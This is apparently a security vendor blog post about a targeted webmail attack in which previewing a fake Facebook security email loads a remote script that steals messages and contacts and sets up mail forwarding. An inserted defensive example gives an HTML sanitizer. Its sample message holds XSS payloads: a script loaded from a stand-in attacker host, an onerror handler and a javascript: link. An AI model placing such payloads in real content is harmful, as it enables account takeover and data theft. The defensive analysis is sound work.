TrendLabs is currently monitoring an in-the-wild attack that highlights the underrated and often ignored risk to companies that allow employees to check their personal webmail while at work.
Yesterday, one of our colleagues in Taiwan received what looks like a targeted attack via webmail. Unlike other email-based attacks that require users to open the email, click on an embedded link or download and execute an attachment, this attack merely requires the user to preview the message in their browser in order to launch the attack.
The following is a screenshot of the email inbox page:

The above message is translated roughly as follows:
Subject: Have you ever logged in Facebook from unknown location?
Content: Dear Facebook User,
Your Facebook account is accessed from a computer or device or from a location that you have never used before. For protecting your account security, before you have confirm your account is not hacked, we temporarily locked down your account.
Have you ever logged in Facebook from other place?
If this is not your name, please use your personal computer to login Facebook and follow the instructions to manage your account information.
If this is not your account, please do not worry. Relogin can lead your back to your own account.
For more information, visit our Help Center here: . {link}
Thanks,
Facebook Security Team
Previewing the message prompts the download of a script from a remote URL. The downloaded script then injects itself into the page to initiate information theft. The stolen information includes sensitive data such as email messages and contact information. More importantly, the script also sets up email forwarding that sends all the user’s messages to a specific address.
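The attack works because message HTML is rendered inside the user's authenticated webmail session with script still in it. As an added example (not code from the TrendLabs post or from any webmail provider), the following is the kind of allowlist sanitization a preview pane must apply to message HTML before rendering it, so that embedded or remotely loaded script never executes; the tag and attribute allowlists and the sample message are constructed for illustration, and a production service should rely on a vetted sanitizer library rather than this reduced version.

```javascript
// Illustrative allowlist sanitizer for webmail message bodies (assumed allowlists).
const ALLOWED_TAGS = new Set(['a', 'b', 'i', 'p', 'br', 'div', 'span', 'ul', 'ol', 'li', 'img']);
const ALLOWED_ATTRS = { a: ['href'], img: ['src', 'alt'] };
// Only these URL schemes survive in href/src; javascript:, data:, vbscript: are rejected.
const SAFE_URL = /^(https?:|mailto:|\/)/i;

function sanitizeAttrs(tag, attrText) {
  const allowed = ALLOWED_ATTRS[tag] || [];
  const attrRe = /([a-zA-Z0-9_:-]+)\s*=\s*("([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  const out = [];
  let m;
  while ((m = attrRe.exec(attrText)) !== null) {
    const name = m[1].toLowerCase();
    const value = m[3] ?? m[4] ?? m[5] ?? '';
    if (!allowed.includes(name)) continue; // drops every on* handler, style, etc.
    if ((name === 'href' || name === 'src') && !SAFE_URL.test(value.trim())) continue;
    out.push(` ${name}="${value.replace(/"/g, '&quot;')}"`);
  }
  return out.join('');
}

function sanitizeEmailHtml(html) {
  // 1. Remove script/style/iframe/object/embed elements together with their contents.
  const blockRe = /<(script|style|iframe|object|embed)\b[^>]*>[\s\S]*?<\/\1\s*>/gi;
  const stripped = html.replace(blockRe, '');
  // 2. Rewrite every remaining tag: keep allowlisted tags with filtered attributes,
  //    drop all other tags, and escape any '<' that does not form a complete tag.
  return stripped.replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>|</g, (whole, rawTag, attrs) => {
    if (rawTag === undefined) return '&lt;'; // lone '<' in text, e.g. "1 < 2" or "<scr"
    const tag = rawTag.toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) return '';
    if (whole.startsWith('</')) return `</${tag}>`;
    return `<${tag}${sanitizeAttrs(tag, attrs)}>`;
  });
}

// Constructed sample resembling the lure described above, with script injection added.
const SAMPLE_MESSAGE =
  '<p>Dear Facebook User,</p><script src="http://attacker.invalid/x.js"></script>' +
  '<img src="x" onerror="alert(1)"><a href="javascript:alert(2)" onclick="steal()">Help Center</a>' +
  '<a href="https://example.com/help">Help</a>1 < 2';

function sanitizedSample() {
  return sanitizeEmailHtml(SAMPLE_MESSAGE);
}
```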
The email appears to be crafted for a specific recipient: the recipient's Hotmail ID is used in the malicious script embedded in the mail. The subsequent download is also keyed to the Hotmail ID and to a number specified by the attacker; changing the number may change the payload.
If an employee checks their personal webmail at work and falls victim to the attack, the attacker can gain access to sensitive information that may relate to the company the employee works for, including contacts and email messages. Companies should take the risk of this and similar attacks seriously, especially considering that merely previewing the email launches the attack.
TrendLabs is currently working on a more detailed analysis of the attack. Just the same, users are advised to exercise caution when opening their Web-based email inbox especially at work, since attacks like these may inadvertently compromise sensitive data.
Trend Micro already detects the downloaded malicious script as JS_AGENT.SMJ and blocks the malicious URL used in this attack. We strongly recommend that Trend Micro customers enable Web Reputation in their Trend Micro product right away to avoid being victimized by this and similar attacks. Non-Trend Micro customers can protect themselves through a combination of free tools like Trend Micro Web Protect Add-on and Browser Guard, or the like.